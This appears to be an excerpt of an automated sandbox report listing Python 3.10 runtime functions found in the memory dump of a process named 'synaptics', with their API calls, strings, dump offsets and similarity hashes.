                                                                                                                                                                                                      Function 6C568DD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyMem_RawWcsdup.PYTHON310(UTF-8), ref: 6C568DEE
                                                                                                                                                                                                        • Part of subcall function 6C4A6FF0: memcpy.VCRUNTIME140(00000000,?), ref: 6C4A7043
                                                                                                                                                                                                      • GetACP.KERNEL32 ref: 6C568E04
                                                                                                                                                                                                      • _PyMem_RawWcsdup.PYTHON310(?,?,00000017,cp%u,00000000), ref: 6C568E25
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Mem_Wcsdup$memcpy
                                                                                                                                                                                                      • String ID: UTF-8$cp%u
                                                                                                                                                                                                      • API String ID: 3544986770-3137851355
                                                                                                                                                                                                      • Opcode ID: 2f4cf180f0e2400a4602b8d464cfb6fba068d27bd6804275ad888742b65c6120
                                                                                                                                                                                                      • Instruction ID: b2175e90b7df48c630f44ec3c945293bdfe04e386e4868effd97b09c35b15a51
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f4cf180f0e2400a4602b8d464cfb6fba068d27bd6804275ad888742b65c6120
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82F03C70A1010CABCF10EBF4DD45AED77B89F49109F50056DE90997B41EB345E19C796
                                                                                                                                                                                                      Function 6C4D4860 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyUnicode_Ready.PYTHON310(?), ref: 6C4D4878
                                                                                                                                                                                                        • Part of subcall function 6C4D1F70: _PyErr_NoMemory.PYTHON310(00000000,?,?,?), ref: 6C4D1FF2
                                                                                                                                                                                                      • _PyUnicode_Copy.PYTHON310(?), ref: 6C4D4896
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(Can't convert '%.100s' object to str implicitly,?), ref: 6C4D48AF
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_Clear.PYTHON310(?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B62
                                                                                                                                                                                                        • Part of subcall function 6C566B50: PyUnicode_FromFormatV.PYTHON310(?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B6C
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_SetObject.PYTHON310(?,?,00000000,?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B78
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Can't convert '%.100s' object to str implicitly, xrefs: 6C4D48A4
                                                                                                                                                                                                      • @Btl, xrefs: 6C4D486A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$Unicode_$Format$ClearCopyFromMemoryObjectReady
                                                                                                                                                                                                      • String ID: @Btl$Can't convert '%.100s' object to str implicitly
                                                                                                                                                                                                      • API String ID: 916232946-3810805180
                                                                                                                                                                                                      • Opcode ID: e35045174c948937b43900ba77c6cb6b42a4b2f1787051888e3cf3fa34dddaf9
                                                                                                                                                                                                      • Instruction ID: c00c97c87c2379c062ac7851f7af9664bccac17308b759e4d794be65ea035146
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e35045174c948937b43900ba77c6cb6b42a4b2f1787051888e3cf3fa34dddaf9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02F0E9396006545BCA10AB98BC11EC5B368DF012FEB054635F85D83F91D315F5A493C1
                                                                                                                                                                                                      Function 6C4B0CC0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 31COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,?), ref: 6C4B0CD7
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\setobject.c,000008F7), ref: 6C4B0CFE
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • P5tl, xrefs: 6C4B0CCA
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C4B0CF2
                                                                                                                                                                                                      • D:\a\1\s\Objects\setobject.c, xrefs: 6C4B0CED
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_FormatSubtypeType_
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\setobject.c$P5tl
                                                                                                                                                                                                      • API String ID: 2789853835-3743485345
                                                                                                                                                                                                      • Opcode ID: 91f4e5eb29450569ce397a8fe8e71c478b39140dfe61362fce06aa09b4502fe5
                                                                                                                                                                                                      • Instruction ID: 7a54cb980507c0a07052fc051031038f83569062676dff63e78d715f704df9ac
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 91f4e5eb29450569ce397a8fe8e71c478b39140dfe61362fce06aa09b4502fe5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FAE092B2A00214638901A6B9BE42CD6776C4B152BBF054936F92CE7F81FB31F61483F1
                                                                                                                                                                                                      Function 6C4B0DD0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,?), ref: 6C4B0DE7
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\setobject.c,0000090B), ref: 6C4B0E0E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C4B0E02
                                                                                                                                                                                                      • D:\a\1\s\Objects\setobject.c, xrefs: 6C4B0DFD
                                                                                                                                                                                                      • P5tl, xrefs: 6C4B0DDA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_FormatSubtypeType_
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\setobject.c$P5tl
                                                                                                                                                                                                      • API String ID: 2789853835-3743485345
                                                                                                                                                                                                      • Opcode ID: fbe6f5156c98453fc1f5b7dc7505fab9e9aec333f04e6e3bbd5adbb91dedea0a
                                                                                                                                                                                                      • Instruction ID: ffc1ebcc530195a266abb45c1c650ee9823c4017460c9f7257419423afc3258c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbe6f5156c98453fc1f5b7dc7505fab9e9aec333f04e6e3bbd5adbb91dedea0a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9CE09BB2700118678901DAA99D41D96B7A887152B7B044925F91CE7F41E631F92047F0
                                                                                                                                                                                                      Function 6C47C930 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(%.200s attribute not set,reason), ref: 6C47C94D
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_Clear.PYTHON310(?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B62
                                                                                                                                                                                                        • Part of subcall function 6C566B50: PyUnicode_FromFormatV.PYTHON310(?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B6C
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_SetObject.PYTHON310(?,?,00000000,?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B78
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(%.200s attribute must be unicode,reason), ref: 6C47C975
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$Format$ClearFromObjectUnicode_
                                                                                                                                                                                                      • String ID: %.200s attribute must be unicode$%.200s attribute not set$reason
                                                                                                                                                                                                      • API String ID: 4090262012-3328498795
                                                                                                                                                                                                      • Opcode ID: 28e5adf8624e1f2f0a235cd9c57efe9a0d291c4364392f238a75fe4c831091dd
                                                                                                                                                                                                      • Instruction ID: f8f969e17d2c23dfc94aeff1a0cbe06b89fd79b00e9a889cc480abc4d1e0fc0f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28e5adf8624e1f2f0a235cd9c57efe9a0d291c4364392f238a75fe4c831091dd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3CE09230708204EFDB10EE71FC11E557BA6DB8560EB050468F80D93F23EB26E8224A94
                                                                                                                                                                                                      Function 6C47C9F0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(%.200s attribute not set,reason), ref: 6C47CA0D
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_Clear.PYTHON310(?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B62
                                                                                                                                                                                                        • Part of subcall function 6C566B50: PyUnicode_FromFormatV.PYTHON310(?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B6C
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_SetObject.PYTHON310(?,?,00000000,?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B78
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(%.200s attribute must be unicode,reason), ref: 6C47CA35
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$Format$ClearFromObjectUnicode_
                                                                                                                                                                                                      • String ID: %.200s attribute must be unicode$%.200s attribute not set$reason
                                                                                                                                                                                                      • API String ID: 4090262012-3328498795
                                                                                                                                                                                                      • Opcode ID: 28e5adf8624e1f2f0a235cd9c57efe9a0d291c4364392f238a75fe4c831091dd
                                                                                                                                                                                                      • Instruction ID: f61e13f7772a2dd543d242cfe3088e4c3dbce15f7558d8ef0d073181974bce7e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28e5adf8624e1f2f0a235cd9c57efe9a0d291c4364392f238a75fe4c831091dd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BAE09234348204AFCF10EE75FC11E553BB6DB8560FB050468F80C93F23EB26E8218A94
                                                                                                                                                                                                      Function 6C47C990 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(%.200s attribute not set,reason), ref: 6C47C9AD
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_Clear.PYTHON310(?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B62
                                                                                                                                                                                                        • Part of subcall function 6C566B50: PyUnicode_FromFormatV.PYTHON310(?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B6C
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_SetObject.PYTHON310(?,?,00000000,?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B78
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(%.200s attribute must be unicode,reason), ref: 6C47C9D5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$Format$ClearFromObjectUnicode_
                                                                                                                                                                                                      • String ID: %.200s attribute must be unicode$%.200s attribute not set$reason
                                                                                                                                                                                                      • API String ID: 4090262012-3328498795
                                                                                                                                                                                                      • Opcode ID: 28e5adf8624e1f2f0a235cd9c57efe9a0d291c4364392f238a75fe4c831091dd
                                                                                                                                                                                                      • Instruction ID: bb2300dd4c2eb740801c1b4d5af9aab51b6412b27d22f2d6b5e48633460dc5b6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28e5adf8624e1f2f0a235cd9c57efe9a0d291c4364392f238a75fe4c831091dd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08E09231308204EFCB10EE71FC11E5637B6DB9560EB0504A8F80DD3F23EB26E8214A94
                                                                                                                                                                                                      Function 6C4F4B40 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 27COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _Py_FatalErrorFunc.PYTHON310(tok_backup,tokenizer beginning of buffer,6C4F5EF0), ref: 6C4F4B62
                                                                                                                                                                                                      • _Py_FatalErrorFunc.PYTHON310(tok_backup,tok_backup: wrong character,tok_backup,tokenizer beginning of buffer,6C4F5EF0), ref: 6C4F4B71
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFatalFunc
                                                                                                                                                                                                      • String ID: tok_backup$tok_backup: wrong character$tokenizer beginning of buffer
                                                                                                                                                                                                      • API String ID: 3270291990-3334089732
                                                                                                                                                                                                      • Opcode ID: 9adba16f6e4d81462766286304f11952917ab6d21eb4d5df3eb0945b9ab76b13
                                                                                                                                                                                                      • Instruction ID: 4c4df27fcb6eb2ada0ff7140b3383406e4a1a4774e7a9ef87feed772f2d5d840
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9adba16f6e4d81462766286304f11952917ab6d21eb4d5df3eb0945b9ab76b13
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4D05BB0312454698A40E6285B40F587ED15AD236D7748BC4B038DBD92D711D6179714
                                                                                                                                                                                                      Function 6C4E8820 Relevance: 7.6, APIs: 5, Instructions: 147COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyUnicode_Ready.PYTHON310(?), ref: 6C4E8831
                                                                                                                                                                                                        • Part of subcall function 6C4D1F70: _PyErr_NoMemory.PYTHON310(00000000,?,?,?), ref: 6C4D1FF2
                                                                                                                                                                                                      • _PyUnicode_Ready.PYTHON310(00000080), ref: 6C4E8848
                                                                                                                                                                                                      • PyUnicode_FindChar.PYTHON310(00000080,?,00000000,?,00000001), ref: 6C4E8903
                                                                                                                                                                                                      • PyUnicode_FindChar.PYTHON310(00000080,?,00000000,?,00000001), ref: 6C4E895E
                                                                                                                                                                                                      • PyUnicode_Substring.PYTHON310(?,00000000,?), ref: 6C4E8975
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
